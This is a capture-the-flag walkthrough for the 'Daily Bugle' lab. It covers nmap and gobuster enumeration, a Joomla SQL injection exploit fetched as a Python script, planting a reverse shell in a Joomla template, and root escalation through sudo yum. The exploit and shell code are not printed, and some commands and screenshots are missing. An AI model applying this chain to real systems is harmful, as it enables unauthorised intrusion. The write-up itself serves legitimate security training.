If you had to choose between Marvel and DC, who would you choose? I think we all have a favorite, but we cannot deny the fact that we all like Spiderman. This is not a fact, but an opinion so don't hold me to this bold statement! 😅
Today we are going to hack the Daily Bugle, are you ready? 🕵️♀️
Okay, now that we've launched our machine and had a look around our main page, we can start enumerating. Open up your terminal and start up a nmap scan to see which services are running.
nmap -sV -Pn <your machine IP>
We can see that ssh, http and mysql are running. Let's continue with running a gobuster scan to see which hidden directories we can find.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://<your machine IP> -t 50
When we head over to
<ip>/administrator, we see that it opens up a Joomla! login page. Okay, now we need to find the version that is running. We can do this with joomscan.
joomscan -u http://<your machine IP>/administrator/
Okay so we can do this via finding a python exploit, or by running SQLMap (which takes forever). I'll show you the python script way since the lab instructions encourage us to try it.
We can see that there is a valid SQL Injection exploit available for us to use. Now you can go over to Exploit-DB and download this exploit if you are doing the SMLmap method, but we won't be able to use this. Instead we need a python conversion of this exploit. Luckily, I got you!
Download the python exploit from here.
I renamed this file as
exploit.py and saved it in my
/Downloads directory. Now, go back into your terminal and cd into the directory of the downloaded exploit. If you read the instructions from the GitHub page above, you will see that we need to install two packages, so let's do that. While we're at it, let's also turn our
exploit.py into an executable.
pip install art
pip install beautifulsoup4
chmod +x exploit.py
You can download the reverse shell from Pentestmonkey's website or via the following command:
Head over to your Joomla dashboard and navigate to the
Template Customizer. Now, grab that reverse shell file that you just downloaded (it will be in your Downloads directory, and you'll have to extract it), and paste it into your /index.php (or error.php) file. Remember to change the IP address of your reverse shell to the IP of your attacking machine (OPENVPN) and save.
Next, let's cd into our
/var/www/html directory, which is the base directory for our site and it will list all the root files. One file of interest is the
configuration.php file (you can read each file as this is all trial and error to find a file that has valuable information).
Okay, so we are in the final stretch of completing this CTF. Let's see what sudo privileges we have via the
sudo -l command. I apologize for the poor screenshot I took. What is important is that we can run the
Let's head over to GTFObins and see how we can use yum. If the yum binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
You just hacked the Daily Bugle, congratulations! I hope that this was easy enough for you to follow, and until next time, happy hacking! 😁
See more on my GitHub.